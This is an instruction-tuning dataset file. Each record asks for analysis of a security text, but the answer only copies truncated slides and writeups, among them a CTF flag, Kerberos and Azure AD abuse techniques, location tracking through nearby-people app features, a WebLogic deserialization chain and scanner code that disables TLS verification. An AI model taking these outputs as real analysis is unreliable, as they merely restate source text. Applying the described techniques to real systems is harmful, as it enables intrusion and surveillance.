{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n百度数据中心自动化平台演进 百度系统部 高级项目经理 陆川 2015-04-24 目录 IDC自动化平台的定义 1 2 3 百度IDC自动化平台演进 IDC自动化平台的未来 IDC内部 百度IDC运营平台 分布式集群 Web/DB 业务监控 部署 上线 业务运维 IDC运营平台 资源管理 容量管理 监控报警 资源管理 网络 交换机上架 服务器 上架 DNS 负载均衡 初始化 故障处理 供电 空调 冷机 机房    变更管理 百度IDC自动化平台-why  百度每年在IDC上的投入  上架交付3000台机器需要多长时间 百度IDC自动化平台-why 2010 2011 2012 2013 2014 百度服务器保有量 历史上的今天 IDC自动化平台-建立 机器规模 千级 Table.js if{  }elseif{  }else{  IDC自动化平台-扩张 机器规模 万级 变更管理 资源管理 可视化 商业流程引擎 权限管理 配置管理 BPM 数据库 用户管理 业务层 基础层 故障管理 IDC自动化平台-扩张 机器规模 万级 商业流程引擎 流程数量2100+ 流程越来越复杂 效率要求越来越高 crontab 自动任务 控制器 参数定制 周期控制 状态控制 通知机制 IDC自动化平台-成长 机器规模 十万级 机器上线流程 50 8 机器重装流程 50 8  操作时间不可控  优先级不可控  工作量不均等  业务逻辑过于复杂  代码很难复用 IDC自动化平台-成长 机器规模 十万级 流程A 流程B 流程C OP1 OP2 OP3 OP4  原子操作 抽象 按需组合 操作A OP1 OP3 OP5 操作B OP1 OP6 操作C OP2 OP4 OP6 IDC自动化平台-成长 机器规模 十万级 50台机器重装 50台机器上架 10台机器申请vip 流程处理 业务队列 审核确认 校验拆分 serverA | 重装 serverB | 重装 serverC | 上架 serverD | VIP 单机操作 IDC自动化平台-成长 机器规模 十万级 serverA | 重装 serverD | VIP 任务接收 任务处理 校验参数处理 拆分下发 serverA | 重装 | 发送安装参数 | RADI5 serverD | vip | 分配IP | XX集群 serverE | 上架 | 2 serverE | 上架 | 安装校验 | IP/RAID 单机原子操作 重装序列 1 OP1 2 OP2 3 OP3 单机操作 IDC自动化平台-成长 机器规模 十万级 serverA | 重装 | 发送安装参数 | RADI5 serverD | vip | 分配IP | XX集群 serverE | 上架 | 安装校验 | IP/RAID 操作调度 校验缓存调度 workA workB workC 松耦合 定制接入 单机原子操作 IDC自动化平台-成长 机器规模 十万级 serverA | 重装 | 发送安装参数 | RADI5 serverD | vip | 分配IP | XX集群 serverE | 上架 | 安装校验 | IP/RAID 任务队列 事件中心 运维中心 成功-继续下一个操作 失败-转人工运维 原子操作结果 Protal IDC自动化平台-成长 机器规模 十万级 50 28 1 1 1 1 1  流程处理 业务处理 审核 确认 开放平台 300 任务处理层 操作调度层 事件中心 运维中心 超时管理 任务监控 智能分配 集中处理 IDC自动化平台-成长 机器规模 十万级 2010 2011 2012 2013 2014 服务器平均操作时间 2010 2011 2012 2013 2014 网络平均操作时间 IDC自动化平台-成长 机器规模 十万级 2010 2014 人员组成 开发 运维 -10% 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% 2010 2014 自动化成功率 IDC自动化平台-成长 机器规模 十万级 操作调度 集群操作系统 业务运维系统 监控系统 IDC对象 自动化体系结构 外包服务平台 数据统计分析 外部平台 IDC自动化平台-未来 机器规模 百万级 业务监控 IDC监控 CMDB 模式识别 调度处理 可视化 扩容缩容 故障恢复 智能化 结束语  致谢  感谢我的家人  感谢InfoQ & 2015QconBeijing  感谢百度系统部&技术管理部  招最优秀的人才  简历发送至atm_hr@baidu.com  参考资料  百度发布2014年第四季度财报  日交付3000台 百度携浪潮刷新服务器记录 Q&A Thanks 微信silentime @InfoQ infoqc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# pastaAAA Forensics, 350 points ## Description: > This pasta is up to no good. There MUST be something behind it. ![](images/pasta1.png) ## Solution: Using `stegsolve` or [this online tool](https://georgeom.net/StegOnline/image), it's possible to browse through all available planes. We eventually find the following hidden layer: ![](images/pasta2.png) The flag: `picoCTF{pa$ta_1s_lyf3}`.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAAPL  Automated Analog Telephone Logging. Using modern techniques and software to map the PSTN. - Da Beave & Jfalcon - Da Beave Work in the network security field @ Softwink, Inc. Author Asterisk Hacking and Threat Analysis 2008  Syngress Press Hacker/Programmer Author of iWar and various other hacking tools ( X.25 tools, etc) Founder of 'Telephreak' (loose knit Asterisk/VoIP hackers). Check out www.telephreak.org (The BBS!) Founder of The Deathrow OpenVMS cluster JFalcon First Federally Convicted Hacker in Alaska (1994)  Professional consultant and hired gun to Fortune 500 companies  Experimenter, Hacker and Inventor   Brief history.... Yes, we know who we're talking to...... Hand scanning Very slow.... Pick up the phone dial and listen. Can be accurate, but that largely depends on the hand scanners knowledge base. Still a popular pass time for phreaks. (See http://www.handscan.net) Automated Wardialing (Old School) 1980's ..... Made you this guy.... Historical Problems with Automatic Wardialing Typically relied on standard PSTN/POTS connections. Telcos monitor for over utilization of their service and flag the line for further investigation. In some cases they'd shut down your POTS line leaving you to explain what you where doing. Modems are lame. Scan for carriers (data) or tones/fax. Multiple scans. You are limited by your hardware. Later generation CTI hardware? Cost prohibited then, now obsolete (ISA boards!) and need PRI. Sure  things like randomly dialing/random timing help, but still you end up missing a lot. Still the 80' but enter the AppleCat Could generate and detect tones. Good for boxing and for this talk War dialing. Software like Cat's Meow/Phantom Access. Expensive and proprietary API (Later Firmware emulated Hayes command set. We'll talk about his later... 2002'ish. We can do it better. Sorta.... Enter VoIP: Less problems/different headaches. (The good) The world is your oyster. Cheap calls even if they supervise. If they don't, free or next to no", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking Tor at the Application Layer Gregory Fleischer (gfleischer@gmail.com) DRAFT SLIDES Updated slides will be provided after the talk. Most importantly, the updates will include links to permanent location for all online demos. Introduction Introduction  What this talk is about  identifying Tor web traffic  fingerprinting users  attacking at the application layers  There is a heavy emphasis on the client- side, web browsers attacks and JavaScript Introduction  What this talk is NOT about  passive monitoring at exit nodes  network attacks against path selection  using application functionality to increase the likelihood of network attacks  breaking SSL Introduction  Software tested  The Tor Browser Bundle  Vidalia Bundle for Windows  Vidalia Bundle for Mac OS X  Firefox 2, Firefox 3.0 and Firefox 3.5 RC  Torbutton Background Background  Brief overview of Tor  free software developed by The Tor Project  uses onion routing and encryption to provide network anonymity  can be used to circumvent local ISP surveillance and network blocking  can also be used to hide originating IP address from remote servers Background  Adversary model at the application layer  normal browsing, without Tor  local ISP  remote server Background  Adversary model when using Tor  remote server  exit nodes  remote servers ISP  exit nodes ISP Background  Exit nodes as attack points  can inject arbitrary content into non- encrypted responses  but can also modify or replace non- encrypted requests  Tor users make attractive targets because they are self-selecting Background  Applications and Tor  only applications that are proxy aware can use Tor properly  network clients that dont know about Tor may leak the users original IP address  users IP address may also leak for applications that dont use proxy for name lookups Background  DNS requests over Tor  DNS queries are resolved by remote Tor node  resolution can be slow, so queries are cached locally for a minimum of 60 seconds regardless of TTL ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRelatively Easy to Exploit  Easily Automated  Usually not monitored     Kerberos  Kerberos Delegation   Focus on High Privileges  Malicious JIT administration     Ticket based authentication protocol Domain User AS TGS KDC TGT TGS LSASS (KERBEROS) AES256 AES128 RC4 DES ST TGT TGT App Server ST   Why?  An application reusing user credentials  Web server accessing a SQL DB  How?  Request tickets on behalf of the user User1 Web Server SQL Server DC User1 Authentication User1 Ticket Delegated    Delegation to any service   Kerberos Only (S4U2Proxy)  Protocol Transition (S4U2Self + S4U2Proxy) Domain Account or Local System Access NO ACCESS PIVOTING PRIVILEGED FULL CONTROL ACLs Brute Force GPOs Kerberoasting CONSTRAINED DELEGATION GPO TAMPERING BUSTED! Pass-The-Hash Pass-The-Ticket BloodHound GoFetch Domain Admin Enterprise Admin   Dump NTDS.dit (VSS, DRSUAPI)  Golden ticket  Skeleton key   Replication requests from a non-DC machine  Detect crafted tickets  Encryption downgrade   Accounts holding permanent high privileges serve as valuable targets for attackers  JIT Administration  High privileges are required to perform an operation  Get the required privileges for a limited amount of time  When the time period expires, the high privileges are revoked  Reduces the attack surface   Get administrative access for a limited time  Perform malicious operations  Leave no traces behind to avoid detection   Delegation scenario  AdminSDHolder scenario 1  AdminSDHolder scenario 2   Object Ownership  Discretionary Access Control List (DACL)  Access control entries (ACE) DACL User SID Security Group SIDs User Rights Access Token Deny ACEs Allow ACEs Inherited Deny ACEs Inherited Allow ACEs LSA Matches SIDs from The access Token with SIDs in the ACEs   Add a new machine account  Set machine owner to a malicious account  Owner can edit the ACL of the object   GPO Tampering: Enable accounts to be trusted for delegation   DACL Modification:  Add GenericAll ACE for malicious_user on new m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI Know Where You Are: 基于LBSN APP的地理位置追踪 2015年9月15日 赵 双(DFlower) 羅夏樸(Xiapu Luo) 1 Who AM I  赵双 DFlower, dflower.zs@gmail.com  Insight-Labs Team 成员 (http://insight-labs.org)  研究领域漏洞挖掘恶意代码分析手机安全  0day安全软件漏洞分析技术(第2版)作者之一  OWASP China 2010 Xcon 2011 Speaker  羅夏樸 (Xiapu Luo, luoxiapu@gmail.com)  RAP in HKPolyU  研究領域手機安全網絡安全  Papers published in major security conferences (e.g., NDSS, BlackHat, Defcon, etc.) 2 目录  LBSN APP 介绍  基于LBSN APP进行地理位置追踪  实例: 追踪全北京新浪微博用户的地理位置  给APP厂商的建议 3 LBSN APPs  LBSN: Location-based Social Network基于位置的社交 网络  很多LBSN APP具有发现附近的人(Nearby)功能 微信 Wechat 米聊 Mitalk 陌陌 Momo 新浪微博 Weibo 4 LBSN APPs  很多LBSN APP具有发现附近的人(Nearby)功能 SKOUT SayHi Badoo LOVOO 5 LBSN APPs  很多LBSN APP具有发现附近的人(Nearby)功能 当用户使用Nearby功能时  上传自己位置信息  寻找自己所处位置周边的陌生人  允许其他人在一定时间内发现自己  User Server Database t t search people in database save user1s location User1 searches people nearby User1 is found by user2 User1 is not found by user3 save user2s location User2 searches people nearby Save user3s location User3 searches people nearby search people in database search people in database Result 6 目录  LBSN APP 介绍  基于LBSN APP进行地理位置追踪  数据发送  数据获取  数据挖掘  DEMO: Mitalk, Wechat, Weibo  实例: 追踪全北京新浪微博用户的地理位置  给APP厂商的建议 7 如何基于LBSN APP进行位置追踪 1. 数据发送 登录APP并在不同的地理位置搜索附近的人 2. 数据获取 获得时间地点人数据集 3. 数据挖掘 数据集信息足够多的情况下可对目标的日常活动范围和轨迹 进行追踪 8 数据发送 针对不同类型的APP采用不同的数据发送方式 1. 构造数据包 2. 模拟器仿真 APP信息 数据安全性 利用难度 APP Googlepla y下载量 (million) 360电子市 场下载量 (million) 位置精确 度( APP中) 数据传输方式 爬取APP位置数据方式 利用难度 Weibo 5-10 456 100m 明文 构造数据包 低 MeetMe 10-50 0.001 100m 明文 构造数据包 低 Skout 10-50 0.06 1000m 明文 构造数据包 低 SayHi 10-50 0.04 100m 明文 构造数据包 低 Badoo 50-100 0.07 1000m SSL单向认证 参数不明 构造数据包 模拟器仿真 ? Momo 1-5 168 10m SSL单向认证 构造数据包 低 Mitalk 0.5-1 17 100m 带加密参数的明文 破解加密参数&构造数据包 模拟器仿真 高 LOVOO 10-50 0.001 0.1mile SSL单向认证带 加密参数 破解加密参数&构造数据包 模拟器仿真 高 Wechat 100-500 455 100m SSL双向认证 替换证书&构造数据包 模拟器仿真 高 9 1. 数据发送 1. APP数据明文传输 典型APPWeiboMeetmeSayHi, Skout 方式构造并发送包含特定地理位置的数据包获取该位置附近的人  Weibo  Meetme  SayHi  Skout 10 1. 数据发送 2. APP数据采用HTTPS传输SSL单向认证 典型APPMomo 2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Backdooring and hijacking Azure AD accounts by abusing external identities Dirk-jan Mollema / @_dirkjan #BHUSA @BlackHatEvents Information Classification: General whoami - Dirk-jan Mollema - Lives in The Netherlands - Hacker / Researcher / Founder @ Outsider Security - Author of several (Azure) Active Directory tools - mitm6 - ldapdomaindump - BloodHound.py - aclpwn.py - Co-author of ntlmrelayx - ROADtools - Blogs on dirkjanm.io - Tweets stuff on @_dirkjan #BHUSA @BlackHatEvents Information Classification: General  Azure AD  Identity platform for Office 365, Azure Resource Manager, and other Azure things  Also identity platform for any first/third party app you want to integrate with it  This is not about Azure infrastructure/VMs/etc Terminology #BHUSA @BlackHatEvents Information Classification: General  Tenant  A separate instance of Azure AD for an organization.  Most organizations have one primary tenant.  Important security boundary in Azure AD.  Identified by a GUID  Identified by at least a tenantname.onmicrosoft.com domain  Usually also identified by custom domains Terminology #BHUSA @BlackHatEvents Information Classification: General  External identity  Any identity that is not managed by your tenant  Can be another Azure AD tenant, Microsoft account, Google account or even just an email address. Terminology #BHUSA @BlackHatEvents Information Classification: General External collaboration Tenant A Tenant B #BHUSA @BlackHatEvents Information Classification: General External collaboration Tenant A Resource tenant Tenant B Home tenant Guest account Home tenant account Linked #BHUSA @BlackHatEvents Information Classification: General  How does the invite flow work?  How are accounts linked to a different tenant?  What possibilities are there to abuse this? Research questions #BHUSA @BlackHatEvents Information Classification: General  2 tenants:  Primary: Iminyour.cloud (iminyourcloud.onmicrosoft.com)  External: Crosstenantdev (crosstenantd", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Matrix CTF 2021 - אתגר מטריקס 2021 Writeups for the [2021 Matrix CTF](https://ctf.matrixcyberlabs.com/). Solved with zVaz and YaakovC. We solved the challenges third, congratulations to Canlex who solved them first and unblvr who solved them second. Additional resources (including other writeups) can be found [here](https://github.com/Dvd848/CTFs/discussions/14).", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCaendra Inc. 2020 All Rights Reserved Web Application Penetration Testing eXtreme Encod%69ng and /Filtering$/ S e c t i o n 0 1 | M o d u l e 0 1 WAPTXv2: Section 1, Module 1 - Caendra Inc.  2020 Table of Contents MODULE 01 | ENCOD%69NG AND /FILTERING$/ 1.1 Data Encoding Basics 1.2 Filtering Basics | p.2 WAPTXv2: Section 1, Module 1 - Caendra Inc.  2020 Learning Objectives In this module we will talk about different types of data encoding. We will see how to recognize, encode, and decode several different formats as well as discuss filters and how they work. | p.3 WAPTXv2: Section 1, Module 1 - Caendra Inc.  2020 1.1 Data Encoding Basics | p.4 WAPTXv2: Section 1, Module 1 - Caendra Inc.  2020 Even though web applications have different purposes, technologies, etc., the use of data encoding is something that cannot be neglected. From a penetration testing point of view, understanding what kind of data encoding is being used and how it works is fundamental in ensuring that the tests are performed as intended. 1.1 Data Encoding Basics | p.5 WAPTXv2: Section 1, Module 1 - Caendra Inc.  2020 Lets briefly analyze the main types of data encoding used in web-oriented applications:  URL encoding  HTML encoding  Base (32|64) encoding  Unicode encoding 1.1.1 Dissecting Encoding Types | p.6 WAPTXv2: Section 1, Module 1 - Caendra Inc.  2020 http://tools.ietf.org/html/rfc3986#section-2.1 As stated in RFC 3986, URLs sent over the Internet must contain characters in the range of the US-ASCII code character set. If unsafe characters are present in a URL, encoding them is required. The URL-encoding, or percent-encoding, replaces characters outside the allowed set with a \"%\" followed by the two hexadecimal digits representing the numeric value of the octet. 1.1.1.1 URL Encoding | p.7 WAPTXv2: Section 1, Module 1 - Caendra Inc.  2020 http://perishablepress.com/stop-using-unsafe-characters-in-urls/ The table shown here is a simple character encoding chart that is useful in explaining wh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPlease& Stand& by&this& talk& will& start& soon!& DEF CON 2018-13-05 Beijing, China From Dark Visitors to Valued Allies. You&may&have&seen&me&rob&a&bank&on&NatGeo&TV&show&Breakthrough&Season&2& ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!WeChat:!JaysonStreet!Twitter:!JaysonStreet! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Website:!http://JaysonEStreet.com! You&may&have&seen&me&on&the&news&discussing&Hacking&&&security&related&topics.& ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!WeChat:!JaysonStreet!Twitter:!JaysonStreet! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Website:!http://JaysonEStreet.com! Or&you&may&have&unfortunately&seen&me&in&your&server&room!...&&;-)& ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!WeChat:!JaysonStreet!Twitter:!JaysonStreet! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Website:!http://JaysonEStreet.com! What does it mean to be a Hacker? What does it mean to be a Hacker? !!!!!!!!!!!Cai!Lun!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Shen!Kuo!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Professor!Huang!Hongjia! Hackers provide a valuable service to society by discovering vulnerabilities & Reporting them! Why are there no Black Hat Bankers?!? If something is broken but not discovered is it less broken? Companies that help. Resources 1. https://bugcrowd.com/ 2. https://hackerone.com/ 3. http://lutasecurity.com/ If something is broken but not discovered is it less broken? Resources 1. Microsoft https://technet.microsoft.com/en-us/library/dn425036.aspx 2. Apple https://techcrunch.com/2016/08/04/apple-announces-long- awaited-bug-bounty-progr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTRACKING SPIES IN THE SKIES ABOUT THE TALK LAW ENFORCEMENT AND AERIAL SURVEILLANCE History of aerial surveillance (Sam Richards) Technology on spy planes (Jerod MacDonald-Evoy) Detecting surveillance aircraft (Jason Hernandez) HISTORY OF THE SKY SPIES Odd plane patterns noticed, WSJ, Baltimore r/conspiracy (John Wiesman - ADSB Detection) Citizen journalists (Sam Richards) #FBISkySpies and 100 Tail- numbers, links to FlightRadar24 tracks SKY SPIES 101 Sam's story goes viral, a week later AP breaks it into the mainstream Sen. Franken calls for investigation (nothing happens) FBI Planes hidden behind front companies (FVX Research, et. al) WHAT WE KNOW TYPES OF AIRCRAFT Small xed wing (Cessnas) Large dual engine (Beechcraft) Military style (Pilatus) Helicopters Drones (Small and Large) EQUIPMENT Wescam by L3 Communications FLIR SAFIRE IMSI Catchers LETC Devices EXAMPLES OF USE FBI Aerial Surveillance of Freddie Grey protests FBI Aerial Surveillance of Arizona I-10 shooter suspect's apartment Phoenix PD used Pilatus to follow U-haul thief 'Persistent Surveillance Solutions' HIDDEN IN PLANE SIGHT FBI, CBP, DEA and DOJ use of front companies $10 FAA records request reveals equipment The Delaware problem PHOENIX PD PLANE UHaul Chase Phoenix PD FOOTAGE OBTAINED VIA PUBLIC RECORDS REQUEST TRACKING THE SKY SPIES How do we more generally detect surveillance aircraft and activity? Registrations can be changed and obscured Many surveillance technologies are commercially available How much surveillance is happening in other parts of the world? Technical and operational requirements dictate ight patterns Surveillance ights look very dierent from most other trac HOW DO WE TRACK AIRCRAFT? Radar is not practical ADS-B messages are the way to go Active community of radio / aviation / hacking enthusiasts collect ADS-B data Requires a Raspberry Pi 1B+, an RTL-SDR radio, antenna, and internet connection Multiple aggregators collect data FlightRadar24.com, FlightAware.com, adsbexchange.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBoutique Kit Playing WarGames with expensive rootkits and malware Josh m0nk Thomas display( eratta_dc21.drink); This is Ricky Ricky likes to drink Drink when you see Ricky display( eratta_dc21.abuse); Opening Question Hands up if you run Android Keep em up if you run a custom ROM / Kernel Down if you actually compiled it Back up if you didnt look at the source Back up if you didnt do a FULL source audit Dont lie, Santa Claus and the NSA already know the answer preso.start()  @m0nk_dot  Why?  Because logic  My opinions != Accuvant Labs   blah blah blah blah blah  This is about understanding a problem so we can fix it <header> echo $AGENDA Boring Kit  The public space of rootkits and malware No Name Given: Non Public Players and the new rules War Game 1: Hide deep, hide long War Game 2: Run off the processing grid War Game 3: Is it cold in here? Revisiting Tic-tac-toe: The fun we can have BORING KIT The public space of rootkits and malware Im sure its fascinating but Uber 1337 h4x0r <3 teh Malwarez But... DO NOT CARE  Just iterative, boring, annoying crap  Capitalism trumps innovation  Disposable  Non Targeted  zzz Not really 0-Day  Just go find the slides from damn near any recent talk from Mudge. Dont listen to me NO NAME GIVEN Non Public Players and the new rules  2+ players  Game Play Mechanics  Goals RTFM: Generic Game Rules Nameless people doing interesting things  <insert generic government / state sponsored image here>  <insert generic large multinational corporation image here> Define: Player 1 You know those people Maybe Even Or even: Define: Player 2 Define: Player 2 Define: Player 2 Define: Player 2 Game Mechanics  We need all teh 0-Days -> gift wrap  We need all teh Devices -> package  Still kind of boring  Not the real point  Disposable... All teh 0-Dayz!!!!! Cost of the 0-Day? Need moar! No, MOAR!!!! ok, thats better All teh Devices! I need a new computer Moar computer Computer! But I run Android, Im special? Sure Unless I had. ok, thats better  Kit / I", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOracle WebLogic CVE-2022-21350 漏洞分析 漏洞简述 这是个反序列化漏洞,是条新的gadget,在低版本的JDK中可能会造成RCE险 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本 先会调BadAttributeValueExpException.readObject法 接着会调SessionData.toString法 接着会调SessionData.isDebuggingSession法 接着会调SessionData.getAttribute法 接着会调SessionData.getAttributeInternal法 接着会调AttributeWrapperUtils.unwrapObject法 接着会调AttributeWrapperUtils.unwrapEJBObjects法 接着会调BusinessHandleImpl.getBusinessObject法 接着会调HomeHandleImpl.getEJBHome法 可以看到这调了ctx.lookup法 修复建议 及时更新补丁参考oracle官发布的补丁: https://www.oracle.com/security-alerts/cpujan2022.html", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuthor: Recar github: https://github.com/Ciyfly w13scan浅析 w13scan 是一款由w8ay开发的python3的主被动扫描器 被动代理基于 baseproxy.py 作者是 qiye 主动扫描默认是没有爬虫的 这里分析将分为几个部分 基础模块 主动扫描 被动扫描 扫描模块 学习的地方 w13scan浅析 简单的流程图 基础模块 一些环境检测和补丁 version_check() modulePath() patch_all()补丁 初始化 主动扫描 FakeReq FakeResp 解析响应 被动扫描 扫描模块 什么时候启动扫描模块 start方法 run_threads 创建线程 task_run 运行任务 printProgress 输出目前的扫描任务情况 loader插件 主动扫描的解析插件 插件入口 PluginBase 基础插件父类 execute 传入req rsp poc主要函数 paramsCombination 组合dict参数 ResultObject 统一的结果类 self.success 输出漏洞 loader audit loader插件最终执行的方法 PerServer 检测模块 对每个domain的 backup_domain 基于域名的备份文件 errorpage 错误暴露信息 http_smuggling http smuggling 走私攻击 idea idea目录解析 iis_parse iis解析漏洞 net_xss net 通杀xss swf_files 通用flash的xss PerFolder 检测模块 针对url的目录会分隔目录分别访问 backup_folder 扫描备份文件 directory_browse 判断是否是目录遍历 phpinfo_craw 查看此目录下是否存在 phpinfo文件 repository_leak 基于流量动态查找目录下源码泄露 PerFile 检测模块 针对每个文件包括参数 analyze_parameter 反序列化参数分析插件 backup_file 基于文件的备份扫描 command_asp_code asp代码注入 command_php_code php代码注入 command_system 系统命令注入 directory_traversal 路径穿越插件 js_sensitive_content js文件敏感内容匹配 jsonp JSONP寻找插件 php_real_path 信息泄露 poc_fastjson 打fastjson的 shiro Shiro框架检测以及Key爆破 sqli_bool 布尔注入检测 sqli_error 报错注入 sqli_time 时间注入 ssti ssti模板注入探测 struts2_032 Struts2-032远程代码执行 struts2_045 Struts2-045远程代码执行 unauth 未授权访问探测插件 webpack webpack源文件泄漏 xss XSS语义化探测 SearchInputInResponse 解析html查找回显位置 如果回显位置是在html里 如果回显位置是在attibute里 测试 attibutes 测试 html 针对特殊属性进行处理 如果回显位置是注释里 如果回显位置是script里 如果回显的位置是 InlineComment js单行注释 如果回显的位置是 BlockComment js块注释 如果回显的位置是 ScriptIdentifier 如果回显的位置是 ScriptLiteral 学习的地方 (可以抄) colorama 控制台彩色输出 支持windows 随机banner load_file_to_module 另一种动态加载插件的方式 解析post数据类型 raw方法 text 自动解码响应体 将参数拆分为名称和值 返回字典 对url去重泛化模块 代理模块 xss 语法语义的形式 等等 简单的流程图 基础模块 一些环境检测和补丁 version_check() 检测是否py3 modulePath() 方法是如果是将这个w13scan.py打包成exe了的获取的路径 源自 sqlmap patch_all()补丁 关闭https请求时的验证及 忽略urllib3的日志 def patch_all(): disable_warnings() logging.getLogger(\"urllib3\").setLevel(logging.CRITICAL) ssl._create_default_https_context = ssl._create_unverified_conte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBLACK OPS OF TCP/IP Spliced NAT2NAT And Other Packet-Level Misadventures Dan Kaminsky, CISSP DoxPara Research www.doxpara.com Where Im Coming From  Black Hat 2001  Impossible Tunnels through Improbable Networks with OpenSSH  Getting Out: ProxyCommands for Non-TCP comm layers  HTTP, SOCKS, UDP, Packet Radio*, AIM/Yahoo*  Coming In: Active Connection Brokering for NAT2NAT  One host exports SSHD to broker  Other host imports access from broker  Passing Through: Dynamic Forwarding for Psuedo-VPN Work  Web Browsing, Dialpad(Split-H323), etc. Interesting Problems  Instant Portscan  Is it possible to discover instantaneously what network services have been made available, even on massive networks?  Guerrila Multicast  Is it possible to send a single packet to multiple recipients, using todays multicast-free Internet?  NATless NAT  Is it possible to share a globally addressable IP address without translating private IP ranges a la NAT?  Is it possible to allow incoming connections to an IP multiplexed in this manner?  NAT Deadlock Resolution  Is it possible to establish a TCP connection between two hosts, both behind NATs? On Possibility  Restraint Free Engineering  Abandon All Practicality, Ye Who Enter Here  Its amazing what you can do once security is no longer a concern.  Youve got what youve got. Make interesting things happen.  It might end up practical.  It might end up secure.  Right now, its impossible. Fix that first.  Maybe. ObThreeWayHandshakeIntro Connection Request (Alice -> Bob)  SYN: I want to talk to you Connection Response (Bob -> Alice)  SYN|ACK: OK, lets talk.  RST|ACK: I aint listening Connection Initiation (Alice -> Bob)  ACK: OK, beginning conversation. What Do You Want?  Port Ranges  Local Port: What application requested the connection. Usually a random number, 0-65535.  0 is a valid port  Remote Port: What application accepted the connection. Usually a known number  80 for HTTP  143 for IMAP  443 for HTTP/SSL  IP handles who were talking to; Ports ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nconvertquota === 把老的配额文件转换为新的格式 ## 补充说明 **convertquota命令** 用于将老的磁盘额数据文件quota.user和quota.group转换为新格式的文件quota.user和quota.group ### 语法 ```shell convertquota(选项)(参数) ``` ### 选项 ```shell -u仅转换用户磁盘配额数据文件 -g仅转换组磁盘配额数据文件 -f将老的磁盘配额文件转换为新的格式 -e将新的文件格式从大字节序换为小字节序 ``` ### 参数 文件系统指定要转换磁盘配额数据文件格式的文件系统硬盘分区 ### 实例 使用convertquota指令转换指定文件系统`/data`的磁盘配额数据文件在命令行中输入下面的命令 ```shell convertquota -u /data //转换文件系统\"/data\"上的用户磁盘配额文件 ```", "category": "text_analysis", "source": "security_papers"}
